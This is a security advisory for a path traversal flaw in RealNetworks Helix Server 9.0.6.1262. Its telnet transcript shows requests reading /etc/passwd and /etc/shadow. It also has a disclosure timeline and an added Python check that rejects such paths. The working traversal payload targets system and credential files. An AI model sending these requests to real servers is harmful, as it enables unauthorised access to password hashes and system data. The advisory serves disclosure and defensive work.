RealNetworks Helix Server URI Traversal Arbitrary File Access


Vendor: RealNetworks (http://www.realnetworks.com/)
Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Version: 9.0.6.1262

Exploit details:

$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
OPTIONS / RTSP/1.0

RTSP/1.0 200 OK
CSeq: 0
Date: Sat, 15 Mar 2008 00:28:48 GMT
Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible)
Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN
RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707
StatsMask: 3


Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
[..]
Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/shadow
root:HashedPasswdOMG:13885:0:99999:7:::
bin:*:13187:0:99999:7:::
daemon:*:13187:0:99999:7:::
adm:*:13187:0:99999:7:::
lp:*:13187:0:99999:7:::
sync:*:13187:0:99999:7:::
[..]
Connection closed by foreign host.
$
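
A server-side check that would refuse the two GET requests in the session above, as an added example (not code from this advisory or from RealNetworks). The document root `/srv/media/content` and the function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/srv/media/content"  # assumed document root (not from the advisory)


class TraversalError(ValueError):
    """The request path resolves outside the document root."""


def resolve_under_root(request_path, docroot=DOCROOT):
    """Map a request path to a file path, refusing anything outside docroot."""
    # Decode until stable so double-encoded dots (%252e%252e) are seen as "..".
    decoded = request_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        raise TraversalError("more than two layers of percent-encoding")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    root = posixpath.normpath(docroot)
    # Strip leading slashes so "//./.." is joined relative to the root,
    # then collapse "." and ".." before comparing against the root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError(f"{request_path!r} resolves to {candidate}")
    return candidate


def is_allowed(request_path, docroot=DOCROOT):
    """True if the request stays inside docroot, False if it escapes."""
    try:
        resolve_under_root(request_path, docroot)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # First two paths are from the session above; the rest are constructed.
    for p in ["//./././././../../../../../etc/passwd",
              "//./././././../../../../../etc/shadow",
              "/%252e%252e/%252e%252e/%252e%252e/etc/passwd",
              "/videos/./intro.rm"]:
        print("ALLOW" if is_allowed(p) else "DENY ", p)
```

The check is purely lexical; a deployment that allows symbolic links under the document root would also need to resolve them (for example with `os.path.realpath`) before the comparison.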

Timeline:

Reported to vendor: 2008-06-16
Vendor ack: 2008-06-16
Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2


Afterthoughts:

This was discovered during a vulnerability assessment. The client was running outdated
software. The vulnerability was actually discovered by Nessus: one of the web-server-related
plugins fired, tried a traversal, and found this.

Real's response and immediate reply (mail, and then a phone call with extensive
discussion) were very well handled. Kudos to them for taking security seriously.

